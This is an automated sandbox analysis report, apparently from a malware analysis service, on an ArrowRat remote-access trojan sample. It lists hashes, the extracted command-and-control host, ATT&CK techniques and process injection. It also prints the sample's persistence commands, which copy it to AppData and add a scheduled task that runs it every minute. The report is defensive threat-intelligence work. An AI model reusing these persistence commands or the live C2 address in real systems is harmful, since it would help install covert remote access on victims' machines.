arrowrat | a0ecd7e8709a733b5c07e102a850e5e626f04e997e5a125632df80a85944b58b

Analysis

max time kernel
132s
max time network
142s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
25-09-2024 02:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a0ecd7e8709a733b5c07e102a850e5e626f04e997e5a125632df80a85944b58b.exe
Size

732KB
MD5

ab0d49fdafb94d853b64632422636c97
SHA1

114878c7437c44b9d33085f3f75ca16f4e3aa9dc
SHA256

a0ecd7e8709a733b5c07e102a850e5e626f04e997e5a125632df80a85944b58b
SHA512

d358354275e32cdb8526687f9e27ef3d419d5ed2449d22f1b9230dbce92aed8bade6d2b5d45b3504336b76a8718af782c9ef78e42b3a0fb8a5428e41a99a529a
SSDEEP

12288:VD9TFmMwfrck/YEwEVhftq6rmIGD9P5X5U4LVkYdS7Ffi:KgERVNQ6Fq9hX5U4L94Zi

Score

10^/10

arrowrat client discovery persistence rat

Malware Config

Extracted

Family

arrowrat

Botnet

Client

vncnew1984.duckdns.org:1984

Mutex

ecZCILAfG

Signatures

ArrowRat
Remote access tool with various capabilities first seen in late 2021.
rat arrowrat

Boot or Logon Autostart Execution: Active Setup 2 TTPs 1 IoCs

Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

persistence

Active Setup

T1547.014

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Active Setup\Installed Components	explorer.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 2468 set thread context of 2600	2468	a0ecd7e8709a733b5c07e102a850e5e626f04e997e5a125632df80a85944b58b.exe	31
PID 2600 set thread context of 3064	2600	RegAsm.exe	34

System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	a0ecd7e8709a733b5c07e102a850e5e626f04e997e5a125632df80a85944b58b.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Modifies registry class 5 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	explorer.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
1996	schtasks.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2600	RegAsm.exe
2600	RegAsm.exe

Suspicious use of AdjustPrivilegeToken 13 IoCs

description	pid	Process
Token: SeDebugPrivilege	2468	a0ecd7e8709a733b5c07e102a850e5e626f04e997e5a125632df80a85944b58b.exe
Token: SeDebugPrivilege	2600	RegAsm.exe
Token: SeShutdownPrivilege	3032	explorer.exe
Token: SeShutdownPrivilege	3032	explorer.exe
Token: SeShutdownPrivilege	3032	explorer.exe
Token: SeShutdownPrivilege	3032	explorer.exe
Token: SeShutdownPrivilege	3032	explorer.exe
Token: SeShutdownPrivilege	3032	explorer.exe
Token: SeShutdownPrivilege	3032	explorer.exe
Token: SeShutdownPrivilege	3032	explorer.exe
Token: SeShutdownPrivilege	3032	explorer.exe
Token: SeShutdownPrivilege	3032	explorer.exe
Token: SeShutdownPrivilege	3032	explorer.exe

Suspicious use of FindShellTrayWindow 26 IoCs

pid	Process
3032	explorer.exe
3032	explorer.exe
3032	explorer.exe
3032	explorer.exe
3032	explorer.exe
3032	explorer.exe
3032	explorer.exe
3032	explorer.exe
3032	explorer.exe
3032	explorer.exe
3032	explorer.exe
3032	explorer.exe
3032	explorer.exe
3032	explorer.exe
3032	explorer.exe
3032	explorer.exe
3032	explorer.exe
3032	explorer.exe
3032	explorer.exe
3032	explorer.exe
3032	explorer.exe
3032	explorer.exe
3032	explorer.exe
3032	explorer.exe
3032	explorer.exe
3032	explorer.exe

Suspicious use of SendNotifyMessage 17 IoCs

pid	Process
3032	explorer.exe
3032	explorer.exe
3032	explorer.exe
3032	explorer.exe
3032	explorer.exe
3032	explorer.exe
3032	explorer.exe
3032	explorer.exe
3032	explorer.exe
3032	explorer.exe
3032	explorer.exe
3032	explorer.exe
3032	explorer.exe
3032	explorer.exe
3032	explorer.exe
3032	explorer.exe
3032	explorer.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2600	RegAsm.exe

Suspicious use of WriteProcessMemory 44 IoCs

description	pid	Process	procid_target
PID 2468 wrote to memory of 2600	2468	a0ecd7e8709a733b5c07e102a850e5e626f04e997e5a125632df80a85944b58b.exe	31
PID 2468 wrote to memory of 2600	2468	a0ecd7e8709a733b5c07e102a850e5e626f04e997e5a125632df80a85944b58b.exe	31
PID 2468 wrote to memory of 2600	2468	a0ecd7e8709a733b5c07e102a850e5e626f04e997e5a125632df80a85944b58b.exe	31
PID 2468 wrote to memory of 2600	2468	a0ecd7e8709a733b5c07e102a850e5e626f04e997e5a125632df80a85944b58b.exe	31
PID 2468 wrote to memory of 2600	2468	a0ecd7e8709a733b5c07e102a850e5e626f04e997e5a125632df80a85944b58b.exe	31
PID 2468 wrote to memory of 2600	2468	a0ecd7e8709a733b5c07e102a850e5e626f04e997e5a125632df80a85944b58b.exe	31
PID 2468 wrote to memory of 2600	2468	a0ecd7e8709a733b5c07e102a850e5e626f04e997e5a125632df80a85944b58b.exe	31
PID 2468 wrote to memory of 2600	2468	a0ecd7e8709a733b5c07e102a850e5e626f04e997e5a125632df80a85944b58b.exe	31
PID 2468 wrote to memory of 2600	2468	a0ecd7e8709a733b5c07e102a850e5e626f04e997e5a125632df80a85944b58b.exe	31
PID 2468 wrote to memory of 2600	2468	a0ecd7e8709a733b5c07e102a850e5e626f04e997e5a125632df80a85944b58b.exe	31
PID 2468 wrote to memory of 2600	2468	a0ecd7e8709a733b5c07e102a850e5e626f04e997e5a125632df80a85944b58b.exe	31
PID 2468 wrote to memory of 2600	2468	a0ecd7e8709a733b5c07e102a850e5e626f04e997e5a125632df80a85944b58b.exe	31
PID 2600 wrote to memory of 3032	2600	RegAsm.exe	33
PID 2600 wrote to memory of 3032	2600	RegAsm.exe	33
PID 2600 wrote to memory of 3032	2600	RegAsm.exe	33
PID 2600 wrote to memory of 3032	2600	RegAsm.exe	33
PID 2600 wrote to memory of 3064	2600	RegAsm.exe	34
PID 2600 wrote to memory of 3064	2600	RegAsm.exe	34
PID 2600 wrote to memory of 3064	2600	RegAsm.exe	34
PID 2600 wrote to memory of 3064	2600	RegAsm.exe	34
PID 2600 wrote to memory of 3064	2600	RegAsm.exe	34
PID 2600 wrote to memory of 3064	2600	RegAsm.exe	34
PID 2600 wrote to memory of 3064	2600	RegAsm.exe	34
PID 2600 wrote to memory of 3064	2600	RegAsm.exe	34
PID 2600 wrote to memory of 3064	2600	RegAsm.exe	34
PID 2468 wrote to memory of 1664	2468	a0ecd7e8709a733b5c07e102a850e5e626f04e997e5a125632df80a85944b58b.exe	36
PID 2468 wrote to memory of 1664	2468	a0ecd7e8709a733b5c07e102a850e5e626f04e997e5a125632df80a85944b58b.exe	36
PID 2468 wrote to memory of 1664	2468	a0ecd7e8709a733b5c07e102a850e5e626f04e997e5a125632df80a85944b58b.exe	36
PID 2468 wrote to memory of 1664	2468	a0ecd7e8709a733b5c07e102a850e5e626f04e997e5a125632df80a85944b58b.exe	36
PID 2468 wrote to memory of 2408	2468	a0ecd7e8709a733b5c07e102a850e5e626f04e997e5a125632df80a85944b58b.exe	38
PID 2468 wrote to memory of 2408	2468	a0ecd7e8709a733b5c07e102a850e5e626f04e997e5a125632df80a85944b58b.exe	38
PID 2468 wrote to memory of 2408	2468	a0ecd7e8709a733b5c07e102a850e5e626f04e997e5a125632df80a85944b58b.exe	38
PID 2468 wrote to memory of 2408	2468	a0ecd7e8709a733b5c07e102a850e5e626f04e997e5a125632df80a85944b58b.exe	38
PID 2468 wrote to memory of 2000	2468	a0ecd7e8709a733b5c07e102a850e5e626f04e997e5a125632df80a85944b58b.exe	39
PID 2468 wrote to memory of 2000	2468	a0ecd7e8709a733b5c07e102a850e5e626f04e997e5a125632df80a85944b58b.exe	39
PID 2468 wrote to memory of 2000	2468	a0ecd7e8709a733b5c07e102a850e5e626f04e997e5a125632df80a85944b58b.exe	39
PID 2468 wrote to memory of 2000	2468	a0ecd7e8709a733b5c07e102a850e5e626f04e997e5a125632df80a85944b58b.exe	39
PID 3032 wrote to memory of 1864	3032	explorer.exe	42
PID 3032 wrote to memory of 1864	3032	explorer.exe	42
PID 3032 wrote to memory of 1864	3032	explorer.exe	42
PID 2408 wrote to memory of 1996	2408	cmd.exe	43
PID 2408 wrote to memory of 1996	2408	cmd.exe	43
PID 2408 wrote to memory of 1996	2408	cmd.exe	43
PID 2408 wrote to memory of 1996	2408	cmd.exe	43

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\a0ecd7e8709a733b5c07e102a850e5e626f04e997e5a125632df80a85944b58b.exe
"C:\Users\Admin\AppData\Local\Temp\a0ecd7e8709a733b5c07e102a850e5e626f04e997e5a125632df80a85944b58b.exe"
1⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2468
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
  2⤵
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2600
- - C:\Windows\explorer.exe
    "C:\Windows\explorer.exe"
    3⤵
    - Boot or Logon Autostart Execution: Active Setup
    - Modifies registry class
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    PID:3032
  - - C:\Windows\system32\ctfmon.exe
      ctfmon.exe
      4⤵
      PID:1864
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client vncnew1984.duckdns.org 1984 ecZCILAfG
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3064
- C:\Windows\SysWOW64\cmd.exe
  "cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\kio"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1664
- C:\Windows\SysWOW64\cmd.exe
  "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nanias" /tr "'C:\Users\Admin\AppData\Roaming\kio\kio.exe'" /f
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2408
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "Nanias" /tr "'C:\Users\Admin\AppData\Roaming\kio\kio.exe'" /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:1996
- C:\Windows\SysWOW64\cmd.exe
  "cmd" /c copy "C:\Users\Admin\AppData\Local\Temp\a0ecd7e8709a733b5c07e102a850e5e626f04e997e5a125632df80a85944b58b.exe" "C:\Users\Admin\AppData\Roaming\kio\kio.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2000

C:\Windows\system32\taskeng.exe
taskeng.exe {43724CF4-A2B7-425E-BB1E-B6666BC70B0C} S-1-5-21-3063565911-2056067323-3330884624-1000:KHBTHJFA\Admin:Interactive:[1]
1⤵
PID:980

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Active Setup

T1547.014

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Active Setup

T1547.014

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2468-0-0x000000007417E000-0x000000007417F000-memory.dmp

Filesize
4KB

Download
memory/2468-1-0x0000000001210000-0x00000000012CC000-memory.dmp

Filesize
752KB

Download
memory/2468-2-0x0000000074170000-0x000000007485E000-memory.dmp

Filesize
6.9MB

Download
memory/2468-3-0x0000000074170000-0x000000007485E000-memory.dmp

Filesize
6.9MB

Download
memory/2468-29-0x0000000074170000-0x000000007485E000-memory.dmp

Filesize
6.9MB

Download
memory/2600-15-0x0000000000400000-0x0000000000460000-memory.dmp

Filesize
384KB

Download
memory/2600-7-0x0000000000400000-0x0000000000460000-memory.dmp

Filesize
384KB

Download
memory/2600-8-0x0000000000400000-0x0000000000460000-memory.dmp

Filesize
384KB

Download
memory/2600-6-0x0000000000400000-0x0000000000460000-memory.dmp

Filesize
384KB

Download
memory/2600-11-0x0000000000400000-0x0000000000460000-memory.dmp

Filesize
384KB

Download
memory/2600-4-0x0000000000400000-0x0000000000460000-memory.dmp

Filesize
384KB

Download
memory/2600-13-0x0000000000400000-0x0000000000460000-memory.dmp

Filesize
384KB

Download
memory/2600-9-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/3064-25-0x0000000000400000-0x0000000000416000-memory.dmp

Filesize
88KB

Download
memory/3064-22-0x0000000000400000-0x0000000000416000-memory.dmp

Filesize
88KB

Download
memory/3064-20-0x0000000000400000-0x0000000000416000-memory.dmp

Filesize
88KB

Download
memory/3064-18-0x0000000000400000-0x0000000000416000-memory.dmp

Filesize
88KB

Download
memory/3064-16-0x0000000000400000-0x0000000000416000-memory.dmp

Filesize
88KB

Download
memory/3064-26-0x0000000000400000-0x0000000000416000-memory.dmp

Filesize
88KB

Download
memory/3064-28-0x0000000000400000-0x0000000000416000-memory.dmp

Filesize
88KB

Download
memory/3064-24-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

Filesize
4KB

Download